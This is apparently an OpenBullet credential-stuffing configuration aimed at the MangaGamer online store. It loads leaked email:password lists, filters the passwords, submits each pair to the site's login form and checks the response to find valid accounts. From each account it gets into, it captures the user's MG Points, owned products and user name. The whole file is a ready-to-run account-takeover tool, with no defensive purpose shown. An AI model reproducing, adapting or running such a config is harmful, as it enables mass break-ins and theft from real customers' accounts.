[SETTINGS]
{
  "Name": "Mangagamer",
  "SuggestedBots": 1,
  "LastModified": "2018-08-09T02:47:06.1499773+00:00",
  "AdditionalInfo": "",
  "Author": "Pepe",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "8",
      "Id": 1424459124
    },
    {
      "SliceName": "PASS",
      "RuleType": 3,
      "RuleString": "20",
      "Id": 1269476342
    },
    {
      "SliceName": "PASS",
      "RuleType": 0,
      "RuleString": "Digit",
      "Id": 1259001889
    },
    {
      "SliceName": "PASS",
      "RuleType": 0,
      "RuleString": "Symbol",
      "Id": 84034836
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Getter REQUEST GET "https://www.mangagamer.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Login REQUEST POST "https://www.mangagamer.com/login_exe.php" AutoRedirect=TRUE 
  CONTENT "hdnType=login&hdnReferer=&txtLoginID=<USER>&txtLoginPassword=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.mangagamer.com/account_login.php?PHPSESSID=dlnkdr88ftho20k0h7vs6afmd4vbh8ba357lsug068unur9ae3d1" 
  HEADER "Origin: https://www.mangagamer.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Authentication Failed" 
  KEYCHAIN Success OR 
    KEY "My Account" 
PARSE "<SOURCE>" CSS "body > table > tbody > tr > td > table:nth-child(3) > tbody > tr > td:nth-child(2) > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(2) > td > table > tbody > tr > td > table > tbody > tr:nth-child(4) > td:nth-child(2)" "innerHTML" 0 -> CAP "MG Points" "" "" 
PARSE "<SOURCE>" CSS "body > table > tbody > tr > td > table:nth-child(3) > tbody > tr > td:nth-child(2) > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(5) > td > table > tbody > tr > td" "innerHTML" 0 -> CAP "Products" "" "" 
PARSE "<SOURCE>" CSS "body > table > tbody > tr > td > table:nth-child(3) > tbody > tr > td:nth-child(2) > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(2) > td > table > tbody > tr:nth-child(2) > td > table > tbody > tr > td > table > tbody > tr:nth-child(2) > td:nth-child(2)" "innerHTML" 0 -> CAP "User" "" "" 
